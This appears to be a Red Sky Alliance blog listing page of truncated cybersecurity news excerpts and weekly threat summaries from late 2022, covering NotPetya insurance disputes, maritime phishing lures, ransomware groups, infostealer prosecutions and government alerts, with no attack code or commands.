X-Industry

The ramifications from the 2017 NotPetya attack, which the US government said was caused by a Russian cyber-attack in Ukraine, continues to be felt worldwide as now cyber insurers are modifying coverage exclusions; that is - expanding the definition of these attacks as an "act of war."  This 5-year-old cyber-attack appears to be leading the insurance industry on its head.

Mondelez International, parent of such popular brands as Cadbury, Oreo, Ritz, and Triscuit, was hit hard by NotPetya, with fa

Red Sky Alliance regularly queries our backend databases, identifying all new data containing Motor Vessel (MV) and Motor Tanker (MT) in the subject line of malicious emails.  Malicious actors use emails with Motor Vessel (MV) or Motor Tanker (MT) in the subject line as a lure to entice users in the maritime industry to open emails containing malicious attachments.  Red Sky Alliance is providing this list of Motor Vessels in which we directly observed the vessel being impersonated, with assoc

Activity Summary - Week Ending on 10 November 2022:

• Red Sky Alliance identified 23,574 connections from new IP’s checking in with our Sinkholes
• Timeweb[.]ru hit 251x – for the 2^nd Week
• Analysts identified 1,762 new IP addresses participating in various Botnets
• Patching is Very Important
• Microsoft Patch Tuesday
• YouTube - You’re Not Helping
• Vidar stealer
• Stolen Data in Australia
• Lloyd’s of London
• School System Stands its Ground
• Oil & Gas - ABBs

Link to full report: IR-22-313-001_weekly313.pdf

Hundreds of regional and national news websites in the United States are delivering malware because of a supply chain attack involving one of their service providers. Cybersecurity researchers reported on 02 November 2022 that a threat actor it tracks as TA569 appears to be behind the attack.  The hackers have targeted an unnamed media company that serves many news outlets in the US.

The service provider delivers content to its partners via a JavaScript file.  The attacker modified the noted cod

Impending doom looked foreseeable with Elon Musk’s $44 billion acquisition of Twitter and began to show early on even before the billionaire completed his purchase.  From the daily tit-for-tat on his Twitter acquisition stance, it became apparent to some that that Musk’s indecisive nature foretold an ominous future for Twitter.  However, the actual chaos ensued just hours after Musk became the largest stakeholder in the bird app.  From his plan to grant a “blue tick” verification symbol to anyon

The internet opened the door to a realm of possibilities that permanently changed the business and social landscape and our personal lives.  Most users are no longer restricted to dial-up; many of us now consider access to a stable internet connection as a critical aspect of our daily lives. We pay our bills online, check our bank statements, communicate via email, and maintain a presence on social media.  Many users rely on the web for work and entertainment, and seeking out information through

According to a new report published by cybersecurity firm Group-IB, a French-speaking cybercrime group may have stolen more than $30 million from banks and other types of organizations in the past years.  The threat actor has been named Opera1er. Some of its activities were previously investigated by others, who have named it Common Raven, Desktop-Group, and NXSMS.

The cyber threat investigators are aware of 30 successful attacks between 2019 and 2021. In many cases, the same victim was attacked

Robots are taking over the world.  According to Oxford Economics, there will be 14 million robots in China by 2030 and 20 million worldwide.  In the USA, robots will modify or replace 1.5 million job positions.  Labor shortages due to the COVID-19 pandemic encouraged both manufacturers and warehouse companies to partner with robotic companies to optimize human and robot collaboration.   We have already seen robots build robots, what is next?

Now enter the engineers from Google, they have unveile

The US Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are raising awareness of the potential threat posed by attempts to manipulate information or spread disinformation in the lead-up to and after the 2022 midterm elections.  Foreign actors may intensify efforts to influence the outcomes of the 2022 midterm elections by circulating or amplifying reports of real or alleged malicious cyber activity on election infrastructure.  Additionally, th

A recent cyber-attack caused the trains operated by Denmark’s largest train service DSB to come to a halt.  Threat actors hit a third-party IT service provider associated with DBS, which slammed the brakes on.  The cyber-attack hit the Danish company Supeo, an IT service that provides enterprise asset management solutions to railway companies, transportation infrastructure operators and public passenger authorities.  DSB is the largest train operating company in Denmark.[1]

“Trains throughout th

Activity Summary - Week Ending on 4 November 2022:

• Red Sky Alliance identified 20,715 connections from new IP’s checking in with our Sinkholes
• Timeweb[.]ru hit 204x
• Analysts identified 1,260 new IP addresses participating in various Botnets
• ShadowPad
• DramaQq
• British Cyber Spies
• Small Business Cyber Security
• German Copper
• Star Gazing stopped in Chile
• French Defense Firm Attack
• Can You Remember ?

Link

Link to full report: IR-22-307-001_weekly308.pdf

Red Sky Alliance maintains a substantial dark web collections data set and we make this data available to our customers through our CTAC, RedXray, and API products.  This gives customers the opportunity to explore and perform analyses on dark web data without the need for establishing a safe infrastructure for navigating the Tor network.  To date we have collected over 1.4 million data points across 80 dark web sites.  The set of sites that we collect from on an ongoing basis will change with ne

A Ukrainian man has been charged with computer fraud for allegedly infecting millions of computers with malware in a cybercrime operation known as "Raccoon Infostealer," the US Justice Department (DOJ) said 25 October 2022.  Mark Sokolovsky, 26, is being held in the Netherlands and the US is seeking his extradition, the DOJ said in a statement.

It said Raccoon Stealer malware was leased to cybercriminals for $200 a month, payable in cryptocurrency.  The malware was then installed on the computer

ShadowPad is a modular malware platform privately shared with multiple PRC-linked threat actors since 2015.   According to SentinelOne, ShadowPad is highly likely the successor to PlugX.  Due to its prevalence in the cyber espionage field, the VMware Threat Analysis Unit (TAU) was motivated to analyze the command and control (C2) protocol to discover active ShadowPad C2s on the Internet.  C2 Protocol:  ShadowPad supports six C2 protocols: TCP, SSL, HTTP, HTTPS, UDP, and DNS.  In this research[1]

Over two and a half years, a Russian-speaking ransomware group named OldGremlin has been attributed to 16 malicious campaigns aimed at entities operating in the transcontinental Eurasian nation.  The group's victims include companies in logistics, industry, insurance, retail, real estate, software development, banking, and arms manufacturing.

OldGremlin is using custom backdoors (TinyPosh and TinyNode) and ransomware (TinyCrypt, a.k.a decr1pt) along with third-party software for reconnaissance a

The FBI released an alert last week warning of hack-and-leak operations targeting organizations in the US and Israel by a group based in Iran.  The alert centers on Emennet Pasargad, an Iranian company US law enforcement agencies have previously spotlighted for its role in efforts to interfere with the 2020 US presidential election.  Last week, the FBI said the company, which has changed its name several times to avoid sanctions, has targeted entities in Israel since 2020 with attacks that invol

The White House has begun its second annual International Counter Ransomware Summit in which Biden administration officials will convene with representatives of three dozen nations, the EU, and private business to discuss the growing threat posed by data-destroying cyberattacks. President Biden will not be attending the meetings.

According to administration officials previewing the summit over the weekend, the two-day event will focus on priorities like improving system resilience and developing

Cyber threat actors are using a never-before-seen technique to stealthily infect victims with malware by abusing legitimate tools.  The campaign has been detailed by cybersecurity researchers  who say that the attackers can spend more than 18 months inside the networks of victims while taking steps to ensure their activity stays under the radar to avoid detection in what's thought to be an intelligence-gathering and espionage operation. 

How the attack begins is still uncertain, but victims beco

The US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) have issued a joint alert on a new cybercrime group targeting organizations in the healthcare sector.

Called Daixin Team, the threat actor has been active since at least June 2022, targeting organizations in the US with ransomware based on leaked Babuk source code in September 2021, and also engaging in data theft and extortion.  It has

Most businesses are surprised by how long a single cyberattack can take to carry out, from beginning to end.  When the average dwell time of an intruder in an IT ecosystem has increased to more than 9 months; why malicious actors seem to be given the luxury of time.

To better understand how this all works, here is a brief review the five stages of a cyberattack.

1. Getting to know the victim: Adversaries start by identifying target organizations and collecting information about them. Key focuses i